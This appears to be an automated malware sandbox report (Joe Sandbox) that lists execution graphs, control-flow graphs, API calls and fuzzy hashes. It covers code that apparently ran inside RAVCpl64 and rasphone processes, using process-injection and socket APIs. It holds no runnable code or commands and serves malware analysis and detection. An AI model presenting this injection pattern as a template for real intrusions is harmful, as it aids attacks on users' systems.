                                                  execution_graph 10054 6e947d 10056 6e94d0 10054->10056 10055 6e9504 socket 10056->10055 10057 6e95bd 10059 6e9611 10057->10059 10058 6e9645 send 10059->10058 10060 49168f2 10063 49168f8 10060->10063 10064 491693e 10060->10064 10061 4916911 SleepEx 10062 4916961 NtCreateSection 10061->10062 10061->10063 10062->10064 10063->10061 10063->10064 10065 6e09fb 10066 6e0a1a 10065->10066 10067 6e0a52 10065->10067 10068 6e0ae8 10067->10068 10069 6e0aba CreateThread 10067->10069 10070 6e9727 10072 6e9765 10070->10072 10071 6e9799 closesocket 10072->10071 10073 6e9675 10075 6e96c1 10073->10075 10074 6e96f5 connect 10075->10074 10076 6eab12 10077 6eab40 10076->10077 10078 6eab44 10077->10078 10079 6eab80 LdrLoadDll 10077->10079 10079->10078 10080 6e1753 10081 6e1756 10080->10081 10083 6e16e2 10080->10083 10082 6e16cb SleepEx 10082->10083 10083->10082 10084 491acaf 10086 491acb4 10084->10086 10085 491adb3 10086->10085 10088 4916a81 10086->10088 10090 4916aa7 10088->10090 10089 4916ae1 SleepEx 10089->10090 10093 4916b15 10089->10093 10090->10089 10091 4916acc 10090->10091 10091->10085 10092 4916b54 NtResumeThread 10092->10091 10093->10091 10093->10092

                                                  Executed Functions

                                                  Function 049168F2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88179273317.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_4560000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: CreateSectionSleep
                                                  • String ID: 0$@$@
                                                  • API String ID: 2866269021-3221051908
                                                  • Opcode ID: fc45fb12322c9bbd596d57ba46e0c8d5ccb8360e8d10f49c3a42f189b3336a1f
                                                  • Instruction ID: 0df1d41342c560c363a801c5aa4ecdefcbe080f91b8e6229c34f57661df6732e
                                                  • Opcode Fuzzy Hash: fc45fb12322c9bbd596d57ba46e0c8d5ccb8360e8d10f49c3a42f189b3336a1f
                                                  • Instruction Fuzzy Hash: 4A518C70A28B5C8FDB15DF58D88179EBBF4FB48704F10052EE88A93250DB34E946CB86
                                                  Function 04916A7D Relevance: 3.1, APIs: 2, Instructions: 93nativethreadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 35 4916a7d-4916aa0 36 4916aa7-4916aca call 49232b1 35->36 37 4916aa2 call 4912d21 35->37 40 4916ad4-4916adb 36->40 41 4916acc-4916ad2 36->41 37->36 43 4916ae1-4916aeb SleepEx 40->43 42 4916b01-4916b14 41->42 44 4916b15-4916b1d 43->44 45 4916aed-4916af2 43->45 47 4916b54-4916b61 NtResumeThread 44->47 48 4916b1f-4916b52 call 4912dc1 call 49232b1 44->48 45->43 46 4916af4-4916afa 45->46 50 4916afc-4916afd 46->50 47->46 49 4916b63-4916b6e 47->49 48->46 48->47 49->50 50->42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88179273317.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_4560000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: ResumeSleepThread
                                                  • String ID:
                                                  • API String ID: 1530989685-0
                                                  • Opcode ID: 0f96f8a897115e142e492e09e5cffea6088568a056a5b9c5f994fc7c8a78ac3f
                                                  • Instruction ID: 1f6faf2c49c6b50dda7e0800f6eb9abbabf9e3a0a07349988cd11bd85596fc38
                                                  • Opcode Fuzzy Hash: 0f96f8a897115e142e492e09e5cffea6088568a056a5b9c5f994fc7c8a78ac3f
                                                  • Instruction Fuzzy Hash: 5021F470618B4D8FDBA8EF2884557AAB7D1FB44314F00063ED85AC32A0EF70E941C745
                                                  Function 006E09FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID: $
                                                  • API String ID: 2422867632-3993045852
                                                  • Opcode ID: 2e0b7a8a222ba6ccb2c52433aeac9efdb1a65178ebba2748599ec5676da14f73
                                                  • Instruction ID: 9ab237a2d4208fe4f362c33fb1b096c9975e2d6bac4311a557ede6ba2d0525b8
                                                  • Opcode Fuzzy Hash: 2e0b7a8a222ba6ccb2c52433aeac9efdb1a65178ebba2748599ec5676da14f73
                                                  • Instruction Fuzzy Hash: 8A21053120C7894FE748DB68E08A3AAB7D1FB99324F0541BED549CB183EB7A9446C746
                                                  Function 006E95BD Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 55 6e95bd-6e9619 call 6e6158 58 6e961b-6e963f call 6ec8c8 55->58 59 6e9645-6e9670 send 55->59 58->59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 7de86bc22e9b085984046479f86baee8ea80efc2966d967a292083424153b4be
                                                  • Instruction ID: ab5be8061e4f7eb8a6f9b997f2db6c4e5e7683c22feddff8e54cbd8386dadf44
                                                  • Opcode Fuzzy Hash: 7de86bc22e9b085984046479f86baee8ea80efc2966d967a292083424153b4be
                                                  • Instruction Fuzzy Hash: 4F215E3051CB448FDB58EF28908865ABBE1FBAC310F04057EE84DCB24BDA709855CB9A
                                                  Function 006E1688 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 62 6e1688-6e16c7 call 6dc338 call 6ec8c8 67 6e173e-6e174d 62->67 68 6e16c9 62->68 69 6e16cb-6e16e0 SleepEx 68->69 70 6e172b-6e1732 69->70 71 6e16e2-6e16e9 69->71 70->69 72 6e1734-6e173c call 6e1608 70->72 71->69 73 6e16eb-6e16fc 71->73 72->69 73->69 75 6e16fe-6e1704 73->75 75->69 77 6e1706-6e1709 75->77 77->69 78 6e170b-6e1729 call 6e7be8 call 6e0188 call 6e02d8 77->78 78->69
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: a04d26c10803e220b180e3badebe0fda629a4daea35a995057117d534a0e6b48
                                                  • Instruction ID: 758af721418aba96f4b0dc4bd9895829781a2d465e668b9f0bce3f7c85d38e91
                                                  • Opcode Fuzzy Hash: a04d26c10803e220b180e3badebe0fda629a4daea35a995057117d534a0e6b48
                                                  • Instruction Fuzzy Hash: 3F11C830615B884FDF94EF2985C46A973E2FB49740F58057DE84ECF356CB3488419B56
                                                  Function 006E947D Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 6e947d-6e94d8 call 6e6028 88 6e94da-6e94fe call 6ec8c8 85->88 89 6e9504-6e9525 socket 85->89 88->89
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID:
                                                  • API String ID: 98920635-0
                                                  • Opcode ID: f2a46dcd14b7ca573d5ebfde7a9b86dd521c7b65b41db5d66ccc8709a4425658
                                                  • Instruction ID: 3c312bce45851a323e34a3fb8e77dd1be73210f6c531e21a91cc900682fa380c
                                                  • Opcode Fuzzy Hash: f2a46dcd14b7ca573d5ebfde7a9b86dd521c7b65b41db5d66ccc8709a4425658
                                                  • Instruction Fuzzy Hash: 44114F3091CB448FDB48EF28D08965ABBE1FFA8314F0401BEE84DCB25ADB709555CB96
                                                  Function 006E9675 Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 92 6e9675-6e96c9 call 6e61e8 95 6e96cb-6e96ef call 6ec8c8 92->95 96 6e96f5-6e9718 connect 92->96 95->96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: connect
                                                  • String ID:
                                                  • API String ID: 1959786783-0
                                                  • Opcode ID: b41e8273cd8d19561302481d2ff4a20ace1265fa65d4cd0316eca4a94463a0a0
                                                  • Instruction ID: 033f11f1c2d09ee9620004ada2275fea8c7150bc31d6ab76f386a424419e173e
                                                  • Opcode Fuzzy Hash: b41e8273cd8d19561302481d2ff4a20ace1265fa65d4cd0316eca4a94463a0a0
                                                  • Instruction Fuzzy Hash: 04114C3091CB488FDB98EF28D08965A7BE2FBA8300F0401BEE84DCB24ADB70C554C795
                                                  Function 006EAB12 Relevance: 1.6, APIs: 1, Instructions: 56libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 99 6eab12-6eab42 call 6ed858 102 6eab4f-6eab5b call 6f0d68 99->102 103 6eab44-6eab4e 99->103 106 6eab5d-6eab64 call 6f1038 102->106 107 6eab69-6eab7e call 6ed048 102->107 106->107 111 6eab9c-6eaba4 107->111 112 6eab80-6eab95 LdrLoadDll 107->112 112->111
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 9d8e23ecbd5419cb660ffa1b03479b4057796c57d98b3eb7cb2d680b9da197bd
                                                  • Instruction ID: 24690d4d40a3c90e3d2784c9929bf382099a8501792232285d0a7469aaecdd0c
                                                  • Opcode Fuzzy Hash: 9d8e23ecbd5419cb660ffa1b03479b4057796c57d98b3eb7cb2d680b9da197bd
                                                  • Instruction Fuzzy Hash: 6901D831518B884BDB54EB76C8C9AA773D2FFD8305F04053EA44EC6250EA35E645C747
                                                  Function 006E9727 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 113 6e9727-6e976d call 6e6278 116 6e976f-6e9793 call 6ec8c8 113->116 117 6e9799-6e97ac closesocket 113->117 116->117
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: a69c29d284226ff3f832cf9d72fe22d174a26eba7ad527f7de551f70b980c483
                                                  • Instruction ID: 20dd38858fe98240db94a390cf6225de9b8de1d6c0c83a60312b51a79665cc61
                                                  • Opcode Fuzzy Hash: a69c29d284226ff3f832cf9d72fe22d174a26eba7ad527f7de551f70b980c483
                                                  • Instruction Fuzzy Hash: 93014C30518B488FDB90EF28C088BAAB7E2FBA8301F440A6EF88DC7255DB3590548756
                                                  Function 006E971A Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 120 6e971a-6e9722 121 6e974d-6e975c 120->121 122 6e9724 120->122 123 6e9765-6e976d 121->123 124 6e9760 call 6e6278 121->124 122->121 125 6e976f-6e9793 call 6ec8c8 123->125 126 6e9799-6e97ac closesocket 123->126 124->123 125->126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: d6d58b28d3d395d618d8cf107967b6151541fb4db110b9ec8b7e26213d9ecb8c
                                                  • Instruction ID: 6359752a1df0a6c68addeadbd6d4890fa0c61d62cbe027fe02aabb4bf93ee75c
                                                  • Opcode Fuzzy Hash: d6d58b28d3d395d618d8cf107967b6151541fb4db110b9ec8b7e26213d9ecb8c
                                                  • Instruction Fuzzy Hash: DBF0AF301597848FDB91EF14C08479977E2FF94300F040A7DE889CB246DB3490568B66
                                                  Function 006E1753 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 6e1753-6e1754 130 6e1756 129->130 131 6e1734-6e173c call 6e1608 129->131 134 6e16cb-6e16e0 SleepEx 131->134 135 6e172b-6e1732 134->135 136 6e16e2-6e16e9 134->136 135->131 135->134 136->134 137 6e16eb-6e16fc 136->137 137->134 138 6e16fe-6e1704 137->138 138->134 139 6e1706-6e1709 138->139 139->134 140 6e170b-6e1729 call 6e7be8 call 6e0188 call 6e02d8 139->140 140->134
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 8c8c5e229f39aa4b9951c2bd97afd25daccc30227bc0b4749955ad953c2fa1e1
                                                  • Instruction ID: 04429a87301ed1723640dd1051e5de5dc67a23043f0ec3017aa788aef1131b41
                                                  • Opcode Fuzzy Hash: 8c8c5e229f39aa4b9951c2bd97afd25daccc30227bc0b4749955ad953c2fa1e1
                                                  • Instruction Fuzzy Hash: 17F09630617B848FCFA5AF1686C46A833A3FB45741F5804BDD40A4E253CA344881AE55

                                                  Execution Graph

                                                  Execution Coverage:0.4%
                                                  Dynamic/Decrypted Code Coverage:91.7%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:12
                                                  Total number of Limit Nodes:1
                                                  execution_graph 82430 4c1f026 82431 4c1f043 82430->82431 82432 4c1f1c9 NtQueryInformationProcess 82431->82432 82435 4c1f23c 82431->82435 82433 4c1f203 82432->82433 82434 4c1f2e1 NtReadVirtualMemory 82433->82434 82433->82435 82434->82435 82437 4882b20 82439 4882b2a 82437->82439 82440 4882b3f LdrInitializeThunk 82439->82440 82441 4882b31 82439->82441 82444 48829f0 LdrInitializeThunk 82429 28e97d1 NtClose

                                                  Executed Functions

                                                  Function 04C1F01D Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 535nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4c1f01d-4c1f01f 1 4c1f021 0->1 2 4c1f094-4c1f19a call 4c1ef58 call 4c21318 call 4c25284 call 4c103d8 call 4c208c8 call 4c103d8 call 4c208c8 call 4c22fe8 0->2 4 4c1f043-4c1f04b 1->4 5 4c1f023 1->5 30 4c1f1a0-4c1f23a call 4c103d8 call 4c208c8 NtQueryInformationProcess call 4c21318 call 4c103d8 call 4c208c8 2->30 31 4c1f66a-4c1f671 call 4c1ef58 2->31 6 4c1f069-4c1f088 call 4c21318 call 4c1d088 4->6 7 4c1f04d-4c1f064 call 4c212f8 4->7 5->4 19 4c1f676-4c1f681 6->19 20 4c1f08e-4c1f08f 6->20 7->6 20->2 43 4c1f23c-4c1f249 30->43 44 4c1f24e-4c1f2ca call 4c25292 call 4c103d8 call 4c208c8 30->44 31->19 43->31 44->43 53 4c1f2d0-4c1f2df call 4c252bc 44->53 56 4c1f2e1-4c1f327 NtReadVirtualMemory call 4c22008 53->56 57 4c1f32c-4c1f372 call 4c103d8 call 4c208c8 call 4c23948 53->57 56->31 66 4c1f391-4c1f48d call 4c103d8 call 4c208c8 call 4c252ca call 4c103d8 call 4c208c8 call 4c23308 call 4c212c8 * 3 call 4c252bc 57->66 67 4c1f374-4c1f38c 57->67 90 4c1f4bd-4c1f4d2 call 4c252bc 66->90 91 4c1f48f-4c1f4bb call 4c252bc call 4c212c8 call 4c2531e call 4c252d8 66->91 67->31 96 4c1f4d4-4c1f4f6 call 4c22ab8 90->96 97 4c1f4fb-4c1f50d call 4c21f48 90->97 102 4c1f512-4c1f51c 91->102 96->97 97->102 104 4c1f5e1-4c1f64a call 4c103d8 call 4c208c8 call 4c23c68 102->104 105 4c1f522-4c1f572 call 4c103d8 call 4c208c8 call 4c23628 call 4c252bc 102->105 104->31 130 4c1f64c-4c1f665 call 4c212f8 104->130 124 4c1f574-4c1f59d call 4c25368 call 4c2531e 105->124 125 4c1f5a7-4c1f5af call 4c252bc 105->125 124->125 125->104 134 4c1f5b1-4c1f5bc 125->134 130->31 134->104 136 4c1f5be-4c1f5dc call 4c23f88 134->136 136->104
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL ref: 04C1F1E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84739097413.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4c10000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID: 0$4`jc
                                                  • API String ID: 1778838933-4258150611
                                                  • Opcode ID: 6bc54acaaf07a6b51117803e740ac15cb168ba4d6aa242876aa84b2e09eed931
                                                  • Instruction ID: c67a69daa4acbb920b4803ae72a9673d0ac97396e9da235f6cd00d2b2d00ef76
                                                  • Opcode Fuzzy Hash: 6bc54acaaf07a6b51117803e740ac15cb168ba4d6aa242876aa84b2e09eed931
                                                  • Instruction Fuzzy Hash: A2024B70518A8C8FDBA5EF68C894AEE77E2FB99304F40062ED94EC7250DF74A641DB41
                                                  Function 04C1F026 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 138 4c1f026-4c1f04b 140 4c1f069-4c1f088 call 4c21318 call 4c1d088 138->140 141 4c1f04d-4c1f064 call 4c212f8 138->141 147 4c1f676-4c1f681 140->147 148 4c1f08e-4c1f19a call 4c1ef58 call 4c21318 call 4c25284 call 4c103d8 call 4c208c8 call 4c103d8 call 4c208c8 call 4c22fe8 140->148 141->140 166 4c1f1a0-4c1f23a call 4c103d8 call 4c208c8 NtQueryInformationProcess call 4c21318 call 4c103d8 call 4c208c8 148->166 167 4c1f66a-4c1f671 call 4c1ef58 148->167 179 4c1f23c-4c1f249 166->179 180 4c1f24e-4c1f2ca call 4c25292 call 4c103d8 call 4c208c8 166->180 167->147 179->167 180->179 189 4c1f2d0-4c1f2df call 4c252bc 180->189 192 4c1f2e1-4c1f322 NtReadVirtualMemory call 4c22008 189->192 193 4c1f32c-4c1f372 call 4c103d8 call 4c208c8 call 4c23948 189->193 196 4c1f327 192->196 202 4c1f391-4c1f48d call 4c103d8 call 4c208c8 call 4c252ca call 4c103d8 call 4c208c8 call 4c23308 call 4c212c8 * 3 call 4c252bc 193->202 203 4c1f374-4c1f38c 193->203 196->167 226 4c1f4bd-4c1f4d2 call 4c252bc 202->226 227 4c1f48f-4c1f4bb call 4c252bc call 4c212c8 call 4c2531e call 4c252d8 202->227 203->167 232 4c1f4d4-4c1f4f6 call 4c22ab8 226->232 233 4c1f4fb-4c1f50d call 4c21f48 226->233 238 4c1f512-4c1f51c 227->238 232->233 233->238 240 4c1f5e1-4c1f64a call 4c103d8 call 4c208c8 call 4c23c68 238->240 241 4c1f522-4c1f572 call 4c103d8 call 4c208c8 call 4c23628 call 4c252bc 238->241 240->167 266 4c1f64c-4c1f665 call 4c212f8 240->266 260 4c1f574-4c1f59d call 4c25368 call 4c2531e 241->260 261 4c1f5a7-4c1f5af call 4c252bc 241->261 260->261 261->240 270 4c1f5b1-4c1f5bc 261->270 266->167 270->240 272 4c1f5be-4c1f5dc call 4c23f88 270->272 272->240
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL ref: 04C1F1E8
                                                  • NtReadVirtualMemory.NTDLL ref: 04C1F2FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84739097413.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4c10000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                  • String ID: 0$=@UW
                                                  • API String ID: 1498878907-3252809520
                                                  • Opcode ID: 5e7dc53e350adfd97784ee7c216314ce44382a1c67372222a9c5629d80bf7ee6
                                                  • Instruction ID: 73218aeaac92b83541cb66da9984f4ef27cc3c5149ad57e18de1396cf79bf43d
                                                  • Opcode Fuzzy Hash: 5e7dc53e350adfd97784ee7c216314ce44382a1c67372222a9c5629d80bf7ee6
                                                  • Instruction Fuzzy Hash: 426170B0918A8C8FEBA5EF28C8546EE77E1FB99304F50062ED54EC7250DF349245DB41
                                                  Function 028E97D1 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 274 28e97d1-28e97e4 NtClose
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84736222975.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_28c0000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 90dc3e58b1d90dd73f62b890fe378dad21b7c367edde4546ad5def4ba94215e2
                                                  • Instruction ID: 895d44e4c001b43a6c3083fcc40c82450ff85b64ac6076447ec573d2c4e52c17
                                                  • Opcode Fuzzy Hash: 90dc3e58b1d90dd73f62b890fe378dad21b7c367edde4546ad5def4ba94215e2
                                                  • Instruction Fuzzy Hash: B8B09B715DD6A21D4717D5244840417E5579C42115709466B5182CB743CF119011C3C2
                                                  Function 04882CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 289 4882cf0-4882cfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 29aa3e87c89a11bd9adc64a32bd935747918bb24de2d357bcb8ff94aaf925254
                                                  • Instruction ID: 09aa54c6ebbeff8c55093bde29f19f92d6417256a9814a3e03c16fefff7edfa8
                                                  • Opcode Fuzzy Hash: 29aa3e87c89a11bd9adc64a32bd935747918bb24de2d357bcb8ff94aaf925254
                                                  • Instruction Fuzzy Hash: C1900221262442527D45B1584504507404697E2285795C956A240E950CC536EC5AF631
                                                  Function 04882C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 4882c30-4882c3c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ea730d5574428629a322456b09b031dfbdbfa393025a984e9377e155e57b8781
                                                  • Instruction ID: 7dd5ab057473d9b36fc9df8af71c5c77579646c558e78a4414bfdc5d666b6c03
                                                  • Opcode Fuzzy Hash: ea730d5574428629a322456b09b031dfbdbfa393025a984e9377e155e57b8781
                                                  • Instruction Fuzzy Hash: 3890022923340102F9807158550860A004587D3246F95DD59A100F558CC935DC6D7331
                                                  Function 04882D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fa8c10da1fc16cfdfc31d40b04f772075beaa40855714268516489266d8b3673
                                                  • Instruction ID: c5fe742174fceb51916b957f2f46a8a9aeeda8f15109a58e4ddbd0eab159a631
                                                  • Opcode Fuzzy Hash: fa8c10da1fc16cfdfc31d40b04f772075beaa40855714268516489266d8b3673
                                                  • Instruction Fuzzy Hash: EF90023122140513F91171584604707004987D2285F95CD56A141E558DD676DD56B131
                                                  Function 04882E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b5ceef0164df86395e39c7eab5721e7e0ecd0792cd23a32cab58edce36df7ee4
                                                  • Instruction ID: d869b3f69e6d9e3b051b81864953a485293e948ccbda80b4d190b369fc2fcb71
                                                  • Opcode Fuzzy Hash: b5ceef0164df86395e39c7eab5721e7e0ecd0792cd23a32cab58edce36df7ee4
                                                  • Instruction Fuzzy Hash: C190026136140542F90071584514B060045C7E3345F55C959E205E554DC639DC567136
                                                  Function 04882F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
